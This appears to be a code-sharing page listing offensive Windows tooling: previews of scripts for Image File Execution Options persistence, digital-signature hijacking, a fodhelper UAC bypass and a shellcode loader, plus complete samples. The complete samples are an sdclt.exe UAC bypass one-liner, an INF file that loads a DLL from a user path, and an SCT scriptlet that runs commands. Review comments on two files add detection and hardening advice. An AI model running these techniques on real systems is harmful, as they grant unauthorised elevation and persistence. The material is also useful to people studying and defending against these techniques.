View ImageFileExecutionOptions.ps1
<# | |
ImageFileExecutionOptions v1.0 | |
License: GPLv3 | |
Author: @netbiosX | |
#> | |
# Image File Execution Options Injection Persistence Technique | |
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ | |
function Persist-Debugger |
View pentestlab-dll.inf
; Review note: setup-information (INF) file whose only visible action is a
; RegisterOCXs directive. Nothing is copied and no registry values are declared.
[version] | |
Signature=$chicago$ | |
; NOTE(review): AdvancedINF presumably marks this as an "advanced" INF handled by
; the advpack-style installer; confirm against the tooling used in your environment.
AdvancedINF=2.5 | |
; Install section: it only hands control to RegisterOCXSection below.
[DefaultInstall_SingleUser] | |
RegisterOCXs=RegisterOCXSection | |
; The section lists a single DLL by absolute path, so processing the install
; section asks the INF engine to register that DLL, which means loading it.
; The DLL sits in a user-profile directory (user-writable), not in a system or
; Program Files location. The page does not show which program processes the
; INF, so confirm the parent process before writing a detection.
; Defender view: alert on INF-driven registration of DLLs from user-writable
; paths, and let application-control policy deny DLL loads from those paths.
[RegisterOCXSection] | |
C:\Users\test.PENTESTLAB\pentestlab.dll |
View DigitalSignature-Hijack.ps1
<# | |
DigitalSignatureHijack v1.0 | |
License: GPLv3 | |
Author: @netbiosX | |
#> | |
# Validate Digital Signature for PowerShell Scripts | |
function ValidateSignaturePS | |
{ | |
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
View customers.xml
<?xml version="1.0"?> | |
<?xml-stylesheet type="text/xsl" href="script.xsl" ?> | |
<customers> | |
<customer> | |
<name>Microsoft</name> | |
</customer> | |
</customers> |
View Sdclt.ps1
<# | |
.SYNOPSIS | |
This script can bypass User Account Control (UAC) via sdclt.exe for Windows 10. | |
Author: @netbiosX | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass |
View sdclt.bat
rem Review note: a single chained command with three steps. Each step runs only if
rem the previous one succeeded.
rem   1. reg add    - writes C:\Windows\System32\cmd.exe as data under the per-user key
rem                   HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
rem                   (no /v is given, so presumably the key's default value; confirm).
rem   2. START /W   - launches C:\Windows\System32\sdclt.exe and waits for it to exit.
rem   3. reg delete - removes the same key again.
rem The key is in HKCU, so step 1 needs no administrative rights.
rem Defender view: the key exists only while sdclt.exe runs, so a later registry
rem snapshot will not show it. Detection has to come from registry set and delete
rem auditing on this App Paths key, correlated with process-creation events for
rem sdclt.exe and any child process it starts. Setting UAC to Always Notify is the
rem commonly cited hardening for this class of issue; verify on your build.
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f |
View FodhelperUACBypass.ps1
<# | |
.SYNOPSIS | |
This script can bypass User Account Control (UAC) via fodhelper.exe | |
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts | |
an elevated command prompt. | |
.NOTES | |
Function : FodhelperUACBypass | |
File Name : FodhelperUACBypass.ps1 |
View Shellcode.cs
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
View pentestlab.sct
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="Pentest" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - @netbiosX --> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe"); |